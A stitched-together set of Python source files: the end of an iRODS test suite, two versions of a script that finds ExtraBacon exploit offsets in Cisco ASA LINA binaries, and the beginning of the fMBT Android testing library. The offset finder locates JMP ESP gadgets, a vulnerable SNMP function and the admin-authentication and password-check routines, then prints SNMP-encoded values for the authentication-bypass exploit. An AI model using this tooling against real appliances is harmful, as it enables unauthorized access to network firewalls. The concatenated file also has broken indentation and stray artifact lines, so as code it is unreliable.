    assertiCmdFail(s.sessions[2], "irm " + self.testfile)  # write perm should not be allowed to remove
    assertiCmd(s.sessions[2], "ils -AL " + self.testfile, "LIST", self.testfile)  # should still be listed
###################
# irmtrash
###################
def test_irmtrash_admin(self):
    """irmtrash empties the admin's trash collection."""
    # assertions
    assertiCmd(s.adminsession, "irm " + self.testfile)  # remove from grid
    assertiCmd(s.adminsession, "ils -rL /" + s.adminsession.getZoneName() + "/trash/home/" +
               s.adminsession.getUserName() + "/", "LIST", self.testfile)  # should be listed in trash
    assertiCmd(s.adminsession, "irmtrash")  # empty the trash
    assertiCmdFail(s.adminsession, "ils -rL /" + s.adminsession.getZoneName() + "/trash/home/" +
                   s.adminsession.getUserName() + "/", "LIST", self.testfile)  # should be deleted
###################
# itrim
###################
def test_itrim_with_admin_mode(self):
    """An admin can recursively trim another user's replicas down to one with
    itrim -M -N1."""
    pydevtest_common.touch("file.txt")
    # put 100 small objects as the plain user
    for i in range(0, 100):
        assertiCmd(s.sessions[1], "iput file.txt " + str(i) + ".txt", "EMPTY")
    homepath = "/" + s.adminsession.getZoneName() + "/home/" + s.sessions[1].getUserName() + "/" + s.sessions[1].sessionId
    assertiCmd(s.sessions[1], "irepl -R " + self.testresc + " -r " + homepath, "EMPTY")  # creates replica
    assertiCmd(s.adminsession, "itrim -M -N1 -r " + homepath, "LIST", "Number of files trimmed = 100.")
# ---- (concatenation artifact: separator between source files) ----
#!/usr/bin/env python2
"""
Finds ExtraBacon offsets in LINA.ELF files.
"""
import subprocess
import json
import binascii
# Signature table consumed by Finder.search().  Each entry describes one
# byte-pattern to locate in the objdump disassembly:
#   name         - label attached to the reported match
#   find         - consecutive instruction byte-strings; "??" is a wildcard
#                  byte, a "--" entry means "accept any instruction here"
#   match        - byte-string whose location is reported, found per "type"
#   type         - EXACT: report at the find site itself;
#                  BEFORE/AFTER: scan backward/forward from the find site
#                  until an instruction's bytes equal "match"
#   oneshot      - stop searching for this entry after its first hit
#   before/after - how many surrounding instructions to include in "found"
LINA_FIND = """
[
{
"name": "JMPESP",
"find": [
"ff e4"
],
"match": "ff e4",
"type": "EXACT",
"oneshot": true,
"before": 0,
"after": 0
},
{
"name": "PMCHECK",
"find": [
"8b 75 08",
"89 7d fc",
"8b 16",
"85 d2"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 2
},
{
"name": "ADMAUTH",
"find": [
"c7 45 f0 01 00 00 00",
"66 c7 45 ?? c1 10"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 2
},
{
"name": "SAFE_RET",
"find": [
"8b 45 e4",
"89 44 24 18",
"8b 45 ??",
"89 44 24 14",
"8b 45 ec",
"89 44 24 10",
"8b ?? 10",
"89 ?? 24 08",
"89 ?? 24 0c",
"8b ?? 14",
"89 ?? 24 04",
"8b ?? 18",
"89 ?? 24",
"e8 ?? ?? ff ff",
"85 c0",
"--",
"a3 ?? ?? ?? ??",
"0f 84 ?? ?? ?? ??"
],
"match": "85 c0",
"type": "AFTER",
"oneshot": false,
"before": 1,
"after": 0
}
,
{
"name": "VULNFUNC",
"find": [
"89 e5",
"57",
"56",
"53",
"83 ec 6c",
"a1 ?? ?? ?? ??",
"8b 5d 1c",
"85 c0",
"0f 84 ?? ?? ?? ??",
"8b 03"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 0
}
]
"""
class Finder(object):
    """Disassembles an ELF's .text section with objdump and searches the
    instruction stream for byte-pattern signatures (see LINA_FIND for the
    signature schema)."""

    def __init__(self, fname):
        self.fname = fname
        self.sequences = []
        self._parse_instructions()

    def _parse_instructions(self):
        """Run objdump over .text and collect {address, bytes, operation} dicts,
        one per disassembled instruction."""
        cmd = ["objdump", "-M", "intel", "-w", "-j", ".text", "-D", self.fname]
        ps = subprocess.Popen(cmd, stdout=subprocess.PIPE)
        output = ps.communicate()[0]
        self.instructions = []
        for line in output.split("\n"):
            # instruction lines are exactly three tab-separated fields:
            # "ADDR:", "BYTES", "MNEMONIC OPERANDS"
            line = line.split("\t")
            if len(line) != 3 or ":" not in line[0]:
                continue
            instruction = {}
            instruction["address"] = line[0].strip().replace(":", "")
            instruction["bytes"] = line[1].strip()
            instruction["operation"] = line[2].strip()
            self.instructions.append(instruction)

    def _check_wildcard(self, find_bytes, inst_bytes):
        """Return True when inst_bytes matches find_bytes byte-for-byte,
        treating '??' in find_bytes as a single-byte wildcard."""
        find_bytes = find_bytes.split(" ")
        inst_bytes = inst_bytes.split(" ")
        if len(find_bytes) != len(inst_bytes):
            return False
        for x in range(0, len(find_bytes)):
            if find_bytes[x] == "??":
                continue
            if find_bytes[x] != inst_bytes[x]:
                return False
        return True

    def _find_match(self, i, sequence):
        """Try to match `sequence` against the instructions starting at index i.

        Returns a deep copy of the sequence with a 'found' instruction list
        attached, or None when there is no match at i.
        """
        import copy
        # FIX: bounds guard -- the original indexed past the end of
        # self.instructions when a sequence was longer than the remaining
        # disassembly, raising IndexError
        if i + len(sequence["find"]) > len(self.instructions):
            return None
        for x in range(0, len(sequence["find"])):
            find_bytes = sequence["find"][x]
            inst_bytes = self.instructions[i + x]["bytes"]
            if "--" in find_bytes:
                continue  # '--' slot accepts any instruction
            elif "??" in find_bytes:
                if not self._check_wildcard(find_bytes, inst_bytes):
                    return None
            elif find_bytes not in inst_bytes:
                return None
        if sequence['type'] == 'EXACT':
            ret = copy.deepcopy(sequence)
            ret['found'] = self.instructions[i - sequence['before']: i + sequence['after'] + 1]
            return ret
        # BEFORE scans backward from the match site for 'match';
        # anything else (AFTER) scans forward
        if sequence['type'] == 'BEFORE':
            search_range = range(i, 0, -1)
        else:
            search_range = range(i, len(self.instructions))
        for x in search_range:
            if sequence['match'] == self.instructions[x]['bytes']:
                ret = copy.deepcopy(sequence)
                ret['found'] = self.instructions[x - sequence['before']: x + sequence['after'] + 1]
                return ret
        return None

    def search(self, jsondata):
        """Parse the JSON signature table and yield one match dict per hit.

        FIX: iterate over a snapshot (list(...)) of self.sequences -- the
        original removed one-shot sequences from the very list being iterated,
        which silently skipped the next sequence in the same pass.
        """
        self.sequences = json.loads(jsondata)
        for i in range(0, len(self.instructions)):
            for sequence in list(self.sequences):
                match = self._find_match(i, sequence)
                if match is not None:
                    if sequence['oneshot']:
                        self.sequences.remove(sequence)
                    yield match
def hex_to_snmp(hex_str, convert_endian=True):
    """Convert a hex string (e.g. an address or opcode bytes) to the
    dotted-decimal form embedded in the SNMP payload.

    By default the byte order is reversed (little-endian output).
    Generalized: any odd-length input is zero-padded on the left (the original
    only handled the length-7 case), and the local no longer shadows the
    builtin `hex`.  bytearray yields integer octets on both Python 2 and 3.
    """
    if len(hex_str) % 2:
        hex_str = "0" + hex_str
    octets = bytearray(binascii.unhexlify(hex_str))
    if convert_endian:
        octets.reverse()
    return ".".join(str(octet) for octet in octets)
# if you thought the above code was bad, get a load of this!
def post_auth_func(func):
    """Print offset/bounds/code lines for a matched function and return the
    raw address, page-aligned bounds and first four opcode bytes."""
    # Collect the first four opcode bytes of the matched function; the
    # "continue" acts as a filter once four bytes are gathered.
    before_bytes = []
    for instr in func['found']:
        for byte in instr['bytes'].split(" "):
            if len(before_bytes) == 4:
                continue
            before_bytes.append(byte)
    before_bytes = "".join(before_bytes)
    addr = func['found'][0]['address']
    # Bounds = address rounded down to a 0x1000 page boundary.
    bounds = addr[:-3]
    bounds += "000"
    name = func['name'].lower()
    print("%s_offset\t= \"%s\"\t\t# 0x%08x" % (name, hex_to_snmp(addr), int(addr, 16)))
    print("%s_bounds\t= \"%s\"\t\t# 0x%08x" % (name, hex_to_snmp(bounds), int(bounds, 16)))
    print("%s_code\t= \"%s\"\t\t# 0x%08x" % (name,hex_to_snmp(before_bytes, False), int(before_bytes, 16)))
    return addr, bounds, before_bytes
def post_process(results):
    """Correlate raw signature matches and print the exploit offsets."""
    # Each [0] lookup assumes the signature was found; a missing signature
    # raises IndexError here.
    vuln = [a for a in results if a['name'] == 'VULNFUNC'][0]['found'][0]['address']
    safes = [a for a in results if a['name'] == 'SAFE_RET']
    admauth = [a for a in results if a['name'] == 'ADMAUTH'][0]
    pmcheck = [a for a in results if a['name'] == 'PMCHECK'][0]
    jmpesp = [a for a in results if a['name'] == 'JMPESP'][0]
    for safe in safes:
        # The real safe return site is the SAFE_RET hit whose captured
        # instruction references the vulnerable function's address.
        op = safe['found'][0]['operation']
        #print("%s = %s?" % (vuln, op))
        if vuln in op:
            addr = safe['found'][1]['address']
            print("saferet_offset\t= \"%s\"\t\t# 0x%08x" % (hex_to_snmp(addr), int(addr, 16)))
    # Locate the "ff e4" (jmp esp) bytes inside the matched instruction.
    jmpesp_bytes = jmpesp['found'][0]['bytes'].split(" ")
    jmp_offset = 0
    for x in range(0, len(jmpesp_bytes)):
        # NOTE(review): x + 1 can index past the end when "ff" is the
        # last byte of the instruction.
        if jmpesp_bytes[x] == "ff" and jmpesp_bytes[x + 1] == "e4":
            jmp_offset = x
            break
    jmp_esp_addr = int(jmpesp['found'][0]['address'], 16)
    jmp_esp_addr += jmp_offset
    jmp_esp_str = "%07x" % jmp_esp_addr
    print("jmp_esp_offset\t= \"%s\"\t\t# 0x%08x" % (hex_to_snmp(jmp_esp_str), jmp_esp_addr))
    post_auth_func(admauth)
    post_auth_func(pmcheck)
    # Constant stack adjustment used by the exploit payload.
    print("fix_ebp\t= \"72\"\t\t# 0x48")
if __name__ == '__main__':
    import sys
    try:
        # argv[1] is the lina ELF to scan; IndexError doubles as the
        # missing-argument check.
        f = Finder(sys.argv[1])
        matches = []
        for match in f.search(LINA_FIND):
            #print(match)
            matches.append(match)
        post_process(matches)
    except IndexError:
        # NOTE(review): an IndexError raised inside post_process (missing
        # signature) is also swallowed by this usage message.
        print("Usage: %s lina_file" % sys.argv[0])
# added ruby to lina generator  (stray commit-message line; commented out so the file stays parseable)
#!/usr/bin/env python2
"""
Finds ExtraBacon offsets in LINA.ELF files.
"""
import subprocess
import json
import binascii
# Signature database consumed by Finder.search(): each entry names a byte
# pattern ("find", where "??" is a single-byte wildcard and "--" skips one
# instruction), an anchor instruction ("match"), a search direction
# ("type": EXACT / BEFORE / AFTER), whether only the first hit counts
# ("oneshot"), and how many instructions around the anchor to capture
# ("before"/"after").
LINA_FIND = """
[
{
"name": "JMPESP",
"find": [
"ff e4"
],
"match": "ff e4",
"type": "EXACT",
"oneshot": true,
"before": 0,
"after": 0
},
{
"name": "PMCHECK",
"find": [
"8b 75 08",
"89 7d fc",
"8b 16",
"85 d2"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 2
},
{
"name": "ADMAUTH",
"find": [
"c7 45 f0 01 00 00 00",
"66 c7 45 ?? c1 10"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 2
},
{
"name": "SAFE_RET",
"find": [
"8b 45 e4",
"89 44 24 18",
"8b 45 ??",
"89 44 24 14",
"8b 45 ec",
"89 44 24 10",
"8b ?? 10",
"89 ?? 24 08",
"89 ?? 24 0c",
"8b ?? 14",
"89 ?? 24 04",
"8b ?? 18",
"89 ?? 24",
"e8 ?? ?? ff ff",
"85 c0",
"--",
"a3 ?? ?? ?? ??",
"0f 84 ?? ?? ?? ??"
],
"match": "85 c0",
"type": "AFTER",
"oneshot": false,
"before": 1,
"after": 0
}
,
{
"name": "VULNFUNC",
"find": [
"89 e5",
"57",
"56",
"53",
"83 ec 6c",
"a1 ?? ?? ?? ??",
"8b 5d 1c",
"85 c0",
"0f 84 ?? ?? ?? ??",
"8b 03"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 0
}
]
"""
class Finder(object):
    """Disassembles a lina binary with objdump and searches the resulting
    instruction stream for byte-pattern signatures given as JSON."""

    def __init__(self, fname):
        self.fname = fname
        self.sequences = []
        self._parse_instructions()

    def _parse_instructions(self):
        """Run objdump over .text and parse its listing into a list of
        {'address', 'bytes', 'operation'} dicts (self.instructions)."""
        cmd = ["objdump", "-M", "intel", "-w", "-j", ".text", "-D", self.fname]
        ps = subprocess.Popen(cmd, stdout=subprocess.PIPE)
        output = ps.communicate()[0]
        # Popen.communicate returns bytes on Python 3; decode so the str
        # parsing below works on both Python 2 and 3.
        if not isinstance(output, str):
            output = output.decode("utf-8", "replace")
        self.instructions = []
        for line in output.split("\n"):
            # A disassembly line looks like "address:\tbytes\toperation".
            line = line.split("\t")
            if len(line) != 3 or ":" not in line[0]:
                continue
            instruction = {}
            instruction["address"] = line[0].strip().replace(":", "")
            instruction["bytes"] = line[1].strip()
            instruction["operation"] = line[2].strip()
            self.instructions.append(instruction)

    def _check_wildcard(self, find_bytes, inst_bytes):
        """Compare two space-separated hex byte strings; "??" in find_bytes
        matches any single byte.  Return True on a full match."""
        find_bytes = find_bytes.split(" ")
        inst_bytes = inst_bytes.split(" ")
        if len(find_bytes) != len(inst_bytes):
            return False
        for x in range(0, len(find_bytes)):
            if find_bytes[x] == "??":
                continue
            if find_bytes[x] != inst_bytes[x]:
                return False
        return True

    def _find_match(self, i, sequence):
        """Try to match `sequence` at instruction index i.  Return a deep
        copy of the sequence with the captured 'found' instruction slice
        added, or None when there is no match."""
        import copy
        # Bug fix: guard against running off the end of the instruction
        # list (the original indexed i + x unchecked -> IndexError).
        if i + len(sequence["find"]) > len(self.instructions):
            return None
        for x in range(0, len(sequence["find"])):
            find_bytes = sequence["find"][x]
            inst_bytes = self.instructions[i + x]["bytes"]
            if "--" in find_bytes:
                continue  # "--" matches any instruction
            elif "??" in find_bytes:
                if not self._check_wildcard(find_bytes, inst_bytes):
                    return None
            elif find_bytes not in inst_bytes:
                return None
        if sequence['type'] == 'EXACT':
            ret = copy.deepcopy(sequence)
            ret['found'] = self.instructions[i - sequence['before'] : i + sequence['after'] + 1]
            return ret
        # BEFORE walks backwards from the match; anything else forwards.
        if sequence['type'] == 'BEFORE':
            search_range = range(i, 0, -1)
        else:
            search_range = range(i, len(self.instructions))
        for x in search_range:
            if sequence['match'] == self.instructions[x]['bytes']:
                ret = copy.deepcopy(sequence)
                ret['found'] = self.instructions[x - sequence['before'] : x + sequence['after'] + 1]
                return ret
        return None

    def search(self, jsondata):
        """Generator yielding every signature match in the binary.
        jsondata is a JSON array of sequence specifications."""
        self.sequences = json.loads(jsondata)
        for i in range(0, len(self.instructions)):
            # Bug fix: iterate a snapshot -- removing a oneshot sequence
            # from the live list made the loop skip the next sequence.
            for sequence in list(self.sequences):
                match = self._find_match(i, sequence)
                if match is not None:
                    if sequence['oneshot']:
                        self.sequences.remove(sequence)
                    yield match
def hex_to_snmp(hex_str, convert_endian = True):
    """Convert a hex string such as "09b78010" into a dotted-decimal SNMP
    OID fragment, e.g. "16.128.183.9" with the default byte reversal.

    convert_endian -- when True, emit bytes in reverse (little-endian)
    order; addresses are encoded this way, raw code bytes are not.
    """
    # 7-character addresses (e.g. "%07x"-formatted) get a leading zero so
    # unhexlify accepts them; other odd lengths are not handled.
    if (len(hex_str) == 7):
        hex_str = "0" + hex_str
    # Bug fix: bytearray yields integer byte values on both Python 2 and
    # 3; the original per-character iteration only worked on Python 2.
    byte_values = bytearray(binascii.unhexlify(hex_str))
    if convert_endian:
        byte_values = byte_values[::-1]
    return ".".join(str(b) for b in byte_values)
# if you thought the above code was bad, get a load of this!
def post_auth_func(func):
    """Print ruby-style offset/bounds/code lines for a matched function
    and return its SNMP-encoded offset, page bounds and code-check bytes.

    func -- a match dict from Finder.search() with a 'found' instruction
    list and a 'name'.
    """
    # Collect the first four opcode bytes of the function, used as the
    # "code" sanity-check value.  Break out early once we have them (the
    # original kept scanning every remaining byte).
    before_bytes = []
    for instr in func['found']:
        for byte in instr['bytes'].split(" "):
            if len(before_bytes) == 4:
                break
            before_bytes.append(byte)
        if len(before_bytes) == 4:
            break
    before_bytes = "".join(before_bytes)
    addr = func['found'][0]['address']
    # Page-aligned lower bound of the function address (0x1000 pages).
    bounds = addr[:-3] + "000"
    name = func['name'].lower()
    # Encode each value once and reuse it (the original called
    # hex_to_snmp a second time for every print).
    offset_snmp = hex_to_snmp(addr)
    bounds_snmp = hex_to_snmp(bounds)
    bytes_snmp = hex_to_snmp(before_bytes, False)
    print("%s_offset\t= \"%s\"\t\t# 0x%08x" % (name, offset_snmp, int(addr, 16)))
    print("%s_bounds\t= \"%s\"\t\t# 0x%08x" % (name, bounds_snmp, int(bounds, 16)))
    print("%s_code\t= \"%s\"\t\t# 0x%08x" % (name, bytes_snmp, int(before_bytes, 16)))
    return offset_snmp, bounds_snmp, bytes_snmp
def post_process(results):
    """Correlate the raw signature matches and print exploit offsets,
    followed by a ruby-table line for the version offsets list."""
    # Each [0] lookup assumes the signature was found; a missing signature
    # raises IndexError here.
    vuln = [a for a in results if a['name'] == 'VULNFUNC'][0]['found'][0]['address']
    safes = [a for a in results if a['name'] == 'SAFE_RET']
    admauth = [a for a in results if a['name'] == 'ADMAUTH'][0]
    pmcheck = [a for a in results if a['name'] == 'PMCHECK'][0]
    jmpesp = [a for a in results if a['name'] == 'JMPESP'][0]
    for safe in safes:
        # The real safe return site is the SAFE_RET hit whose captured
        # instruction references the vulnerable function's address.
        op = safe['found'][0]['operation']
        #print("%s = %s?" % (vuln, op))
        if vuln in op:
            addr = safe['found'][1]['address']
            saferet_snmp = hex_to_snmp(addr)
            print("saferet_offset\t= \"%s\"\t\t# 0x%08x" % (hex_to_snmp(addr), int(addr, 16)))
    # NOTE(review): saferet_snmp stays unbound (NameError at the offsets
    # tuple below) when no SAFE_RET entry references the vulnerable
    # function.
    jmpesp_bytes = jmpesp['found'][0]['bytes'].split(" ")
    jmp_offset = 0
    for x in range(0, len(jmpesp_bytes)):
        # NOTE(review): x + 1 can index past the end when "ff" is the last
        # byte of the instruction.
        if jmpesp_bytes[x] == "ff" and jmpesp_bytes[x + 1] == "e4":
            jmp_offset = x
            break
    jmp_esp_addr = int(jmpesp['found'][0]['address'], 16)
    jmp_esp_addr += jmp_offset
    jmp_esp_str = "%07x" % jmp_esp_addr
    print("jmp_esp_offset\t= \"%s\"\t\t# 0x%08x" % (hex_to_snmp(jmp_esp_str), jmp_esp_addr))
    adm_offset_snmp, adm_bounds_snmp, adm_bytes_snmp = post_auth_func(admauth)
    pm_offset_snmp, pm_bounds_snmp, pm_bytes_snmp = post_auth_func(pmcheck)
    # Constant stack adjustment used by the exploit payload.
    print("fix_ebp\t= \"72\"\t\t# 0x48")
    """
    "9.2(3)" => ["29.112.29.8", # jmp_esp_offset, 0
    "134.115.39.9", # saferet_offset, 1
    "72", # fix_ebp, 2
    "0.128.183.9", # pmcheck_bounds, 3
    "16.128.183.9", # pmcheck_offset, 4
    "85.49.192.137", # pmcheck_code, 5
    "0.80.8.8", # admauth_bounds, 6
    "64.90.8.8", # admauth_offset, 7
    "85.137.229.87"], # admauth_code, 8
    """
    # Order matches the commented ruby table above.
    jmp_snmp = hex_to_snmp(jmp_esp_str)
    offsets = (jmp_snmp, saferet_snmp, "72", pm_bounds_snmp, pm_offset_snmp, pm_bytes_snmp, adm_bounds_snmp, adm_offset_snmp, adm_bytes_snmp)
    print('#"VERS" => ["%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s"]' % offsets)
if __name__ == '__main__':
    import sys
    try:
        # argv[1] is the lina ELF to scan; IndexError doubles as the
        # missing-argument check.
        f = Finder(sys.argv[1])
        matches = []
        for match in f.search(LINA_FIND):
            #print(match)
            matches.append(match)
        post_process(matches)
    except IndexError:
        # NOTE(review): an IndexError raised inside post_process (missing
        # signature) is also swallowed by this usage message.
        print("Usage: %s lina_file" % sys.argv[0])
# | (stray concatenation artifact; commented out so the file stays parseable)
# fMBT, free Model Based Testing tool
# Copyright (c) 2013, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for
# more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
#
#
# View._parseDump method contains code that has been published as part
# of the TEMA tool, under the MIT open source license:
#
# Copyright (c) 2006-2010 Tampere University of Technology
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
This library provides a test interface to Android devices.
Device class implements a test interface that is based on Android
Debug Bridge (adb) and Android monkey.
Device's refreshScreenshot() returns a Screenshot object, from which
bitmaps can be searched for.
Device's refreshView() returns a View object, from which UI elements
can be searched according to their id, class, text and other
properties.
Using this library requires that adb is in PATH.
Tips & tricks
-------------
Take a screenshot and save it to a file
import fmbtandroid
fmbtandroid.Device().refreshScreenshot().save("/tmp/screen.png")
* * *
Print view items on device display
import fmbtandroid
print fmbtandroid.Device().refreshView().dumpTree()
* * *
Save generated device ini for modifications
import fmbtandroid
file("/tmp/mydevice.ini", "w").write(fmbtandroid.Device().dumpIni())
* * *
Connect to device based on an ini file
import fmbtandroid
d = fmbtandroid.Device(iniFile=file("/tmp/mydevice.ini"))
d.pressHome()
* * *
Open screenlock by swiping lock.png bitmap on the display to the
east. The lock.png file needs to be in bitmapPath defined in
mydevice.ini.
import fmbtandroid
d = fmbtandroid.Device(iniFile=file("/tmp/mydevice.ini"))
d.refreshScreenshot()
d.swipeBitmap("lock.png", "east")
* * *
Execute a shell command on Android device, show exit status, standard
output and standard error:
import fmbtandroid
status, out, err = fmbtandroid.Device().shellSOE("mkdir /proc/foo")
print 'status: %s, stdout: "%s", stderr: "%s"' % (status, out, err)
* * *
Enable extensive logging with fmbtlogger. You can use functions or
file objects as backends. Example: log to standard output
import fmbtandroid
import fmbtlogger
import sys
d = fmbtandroid.Device()
d = fmbtlogger.text(d, sys.stdout, logDepth=-1)
d.pressPower()
"""
DEVICE_INI_DEFAULTS = '''
[objects]
appsButtonId = id/0x0
appsButtonClass = BubbleTextView
; [application.NAME] sections:
; gridname = exact caption of the application in application grid (text
; property)
; window = string included in topWindow() when application is running
[homescreen]
window = Launcher
'''
import commands
import datetime
import os
import random
import re
import shutil
import socket
import StringIO
import subprocess
import tempfile
import time
import uu
import eyenfinger
import fmbt
# Alternative ImageMagick preprocessing filter chains tried before OCR;
# presumably %(zoom)s is substituted by the eyenfinger OCR engine --
# TODO(review): confirm against eyenfinger usage.
_OCRPREPROCESS = [
    '-sharpen 5 -level 60%%,60%%,1.0 -filter Mitchell %(zoom)s',
    '-sharpen 5 -level 90%%,100%%,3.0 -filter Mitchell -sharpen 5'
]
def _adapterLog(msg):
    """Write msg to the fMBT adapter log with the "fmbtandroid:" prefix."""
    fmbt.adapterlog("fmbtandroid: %s" % (msg,))
def _logFailedCommand(source, command, exitstatus, stdout, stderr):
    """Log a failed shell command with its output, error and exit status."""
    _adapterLog('in %s command "%s" failed:\n    output: %s\n    error: %s\n    status: %s' %
                (source, command, stdout, stderr, exitstatus))
def _fmbtLog(msg):
    """Write msg to the fMBT log with the "fmbtandroid:" prefix."""
    fmbt.fmbtlog("fmbtandroid: %s" % (msg,))
def _filenameTimestamp():
return datetime.datetime.now().strftime("%Y%m%d-%H%M%S-%f")
def _run(command, expectedExitStatus = None):
    """Run a command and return (exitStatus, stdout, stderr).

    command -- a shell string (run with shell=True) or an argv list.
    expectedExitStatus -- int or list of ints; when given, any other exit
    status is logged and raised.  When None, the command is started but
    its output is not collected.
    """
    # A plain string goes through the shell; a list is executed directly.
    if type(command) == str: shell=True
    else: shell=False
    try:
        p = subprocess.Popen(command, shell=shell,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             close_fds=True)
        if expectedExitStatus != None:
            out, err = p.communicate()
        else:
            # Caller does not check the status: do not wait for output.
            out, err = ('', None)
    except Exception, e:
        # Popen itself failed (e.g. executable missing): fake a process
        # with shell-style "command not found" status 127.
        class fakeProcess(object): pass
        p = fakeProcess
        p.returncode = 127
        out, err = ('', e)
    exitStatus = p.returncode
    if expectedExitStatus != None:
        if ((type(expectedExitStatus) in [list, tuple] and
             not exitStatus in expectedExitStatus) or
            (type(expectedExitStatus) == int and
             not exitStatus == expectedExitStatus)):
            msg = 'Unexpected exit status %s from command "%s".\n    Output: %s\n    Error: %s' % (
                exitStatus, command, out, err)
            _adapterLog(msg)
            # NOTE(review): on the fakeProcess path err is an Exception
            # instance, so this substring test may raise -- confirm.
            if "error: device not found" in err:
                raise AndroidDeviceNotFound(msg)
            else:
                raise Exception(msg)
    return (exitStatus, out, err)
def _bitmapPathSolver(fmbtAndroidHomeDir, bitmapPath):
def _solver(bitmap, checkReadable=True):
if bitmap.startswith("/") or os.access(bitmap, os.R_OK):
path = [os.path.dirname(bitmap)]
bitmap = os.path.basename(bitmap)
else:
path = []
for singleDir in bitmapPath.split(":"):
if not singleDir.startswith("/"):
path.append(os.path.join(fmbtAndroidHomeDir, singleDir))
else:
path.append(singleDir)
for singleDir in path:
retval = os.path.join(singleDir, bitmap)
if not checkReadable or os.access(retval, os.R_OK):
break
if checkReadable and not os.access(retval, os.R_OK):
raise ValueError('Bitmap "%s" not readable in bitmapPath %s' % (bitmap, ':'.join(path)))
return retval
return _solver
class Device(object):
    """
    The Device class provides

    - keywords as its methods

    - device properties from device's INI file

    - view() returns the most recently refreshed View, that contains
      items parsed from window dump.

    - screenshot() returns the most recently refreshed Screenshot,
      bitmaps can be searched from this.
    """
    # Maximum number of times refreshView() re-reads a window dump that
    # produced parse errors before accepting it as-is.
    _PARSE_VIEW_RETRY_LIMIT = 10
def __init__(self, deviceName=None, iniFile=None, connect=True):
"""
Connect to given device, or the first not-connected Android
device in the "adb devices" list, if nothing is defined.
Parameters:
deviceName (string, optional):
If deviceName is a device serial number (an item in
the left most column in "adb devices"), connect to
that device. Device information is read from
$FMBTANDROIDHOME/etc/SERIALNUMBER.ini, if it exists.
If deviceName is a nick name, device information is
looked for from $FMBTANDROIDHOME/etc/deviceName.ini,
and the connection is established to the device with
the serial number given in the ini file.
The default is None. The first disconnected device
in the "adb devices" list is connected to. Device
information is read from
$FMBTANDROIDHOME/etc/SERIALNUMBER.ini, if it exists.
iniFile (file object, optional):
A file object that contains device information
ini. Connect to the device with a serial number
given in this file. The default is None.
To create an ini file for a device, use dumpIni. Example:
file("/tmp/test.ini", "w").write(fmbtandroid.Device().dumpIni())
"""
self._fmbtAndroidHomeDir = os.getenv("FMBTANDROIDHOME", os.getcwd())
self._screenSize = None
self._platformVersion = None
self._lastView = None
self._lastScreenshot = None
self._longPressHoldTime = 2.0
self._longTapHoldTime = 2.0
self._conf = _DeviceConf()
self._loadDeviceAndTestINIs(self._fmbtAndroidHomeDir, deviceName, iniFile)
if deviceName == None:
deviceName = self._conf.value("general", "serial", None)
if connect == False and deviceName == None:
deviceName = "nodevice"
self._conn = None
elif deviceName == None:
# Connect to an unspecified device.
# Go through devices in "adb devices".
listDevicesCommand = "adb devices"
status, output, err = _run(listDevicesCommand, expectedExitStatus = [0, 127])
if status == 127:
raise Exception('adb not found in PATH. Check your Android SDK installation.')
outputLines = [l.strip() for l in output.splitlines()]
try: deviceLines = outputLines[outputLines.index("List of devices attached")+1:]
except: deviceLines = []
deviceLines = [l for l in deviceLines if l.strip() != ""]
if deviceLines == []:
raise Exception('No devices found with "%s"' % (listDevicesCommand,))
potentialDevices = [line.split()[0] for line in deviceLines]
for deviceName in potentialDevices:
try:
self.serialNumber = deviceName
self._conf.set("general", "serial", self.serialNumber)
self._conn = _AndroidDeviceConnection(self.serialNumber)
break
except AndroidConnectionError, e:
continue
else:
raise AndroidConnectionError("Could not connect to device(s): %s." % (
", ".join(potentialDevices)))
# Found a device (deviceName).
self._loadDeviceAndTestINIs(self._fmbtAndroidHomeDir, deviceName, iniFile)
else:
# Device name given, find out the serial number to connect to.
# It may be given in device or test run INI files.
self.serialNumber = self._conf.value("general", "serial", deviceName)
if connect:
self._conn = _AndroidDeviceConnection(self.serialNumber)
_deviceIniFilename = self._fmbtAndroidHomeDir + os.sep + "etc" + os.sep + deviceName + ".ini"
self.loadConfig(_deviceIniFilename, override=True, level="device")
# Fetch properties from device configuration
self.nickName = self._conf.value("general", "name", deviceName)
self.phoneNumber = self._conf.value("general", "phonenumber")
# Loading platform-specific configuration requires a
# connection to the device for checking the platform version.
_platformIniFilename = self._fmbtAndroidHomeDir + os.sep + "etc" + os.sep + "android" + self.platformVersion() + ".ini"
# would we need a form-factor ini, too?
self.loadConfig(_platformIniFilename, override=False, level="platform")
self.loadConfig(StringIO.StringIO(DEVICE_INI_DEFAULTS), override=False, level="global default")
self.wlanAP = self._conf.value("environment", "wlanAP")
self.wlanPass = self._conf.value("environment", "wlanPass")
